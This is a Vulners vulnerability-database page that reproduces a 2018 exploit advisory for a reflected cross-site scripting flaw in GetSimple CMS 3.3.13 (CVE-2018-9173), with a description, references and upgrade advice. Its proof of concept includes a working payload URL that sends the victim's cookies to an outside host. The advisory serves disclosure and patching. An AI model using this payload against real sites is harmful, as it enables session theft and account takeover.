Vulners
Lucene search
GetSimple CMS 3.3.13 Cross Site Scripting
🗓️ 05 Apr 2018 00:00:00Reported by Sureshbabu NarvaneniType 
packetstorm🔗 packetstormsecurity.com👁 37 Views
| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
 | GetSimple CMS 3.3.13 - Cross-Site Scripting Vulnerability | 5 Apr 201800:00 | – | zdt |
 | CVE-2018-9173 | 2 Apr 201803:29 | – | attackerkb |
 | GetSimple CMS Cross-Site Scripting Vulnerability | 2 Apr 201800:00 | – | cnvd |
 | CVE-2018-9173 | 2 Apr 201803:00 | – | cve |
 | CVE-2018-9173 | 2 Apr 201803:00 | – | cvelist |
 | GetSimple CMS 3.3.13 - Cross-Site Scripting | 5 Apr 201800:00 | – | exploitdb |
 | EUVD-2018-20770 | 7 Oct 202500:30 | – | euvd |
 | GetSimple CMS 3.3.13 - Cross-Site Scripting | 5 Apr 201800:00 | – | exploitpack |
 | CVE-2018-9173 | 2 Apr 201803:29 | – | nvd |
 | Design/Logic Flaw | 17 Sep 201804:29 | – | prion |
10
`#######################################
# Exploit Title: GetSimple CMS 3.3.13 - Cross Site Scripting Vulnerability
# Google Dork: N/A
# Date: 03-04-2018
#######################################
# Exploit Author: Sureshbabu Narvaneni#
#######################################
# Author Blog : http://nullnews.in
# Vendor Homepage: http://get-simple.info/
# Software Link: http://get-simple.info/download/
# Affected Version: 3.3.13
# Category: WebApps
# Tested on: Win7 Enterprise x86/Kali Linux 4.12 i686
# CVE : CVE-2018-9173
#
# 1. Vendor Description:
#
# GetSimple is an XML based, stand-alone, fully independent and lite
Content Management System. To go along with its
# best-in-class user interface, we have loaded it with features that every
website needs, but with nothing it
# doesn't. GetSimple is truly the simplest way to manage a small-business
website.
#
# 2. Technical Description:
#
# Cross-site scripting (XSS) vulnerability in
admin/template/js/uploadify/uploadify.swf in GetSimple CMS 3.3.13
# allows remote attackers to inject arbitrary web script or HTML, as
demonstrated by the movieName parameter.
#
# 3. Proof Of Concept:
#
# Simple alert.
#
# http://
[URL]GetSimpleCMS-3.3.13/admin/template/js/uploadify/uploadify.swf?movieName="])}catch(
# e){alert("MrR3boot")}//
#
# Grab the cookies
#
# http://
[URL]GetSimpleCMS-3.3.13/admin/template/js/uploadify/uploadify.swf?movieName="])}catch(
# e){window.location="https://mrreboot.here?"+document.cookie}//
#
# 4. Solution:
#
# Upgrade to latest release.
# http://get-simple.info/download/
#
# 5. Reference:
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9173
# https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1266
#####################################
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
05 Apr 2018 00:00Current
6.4Medium risk
Vulners AI Score6.4
EPSS0.005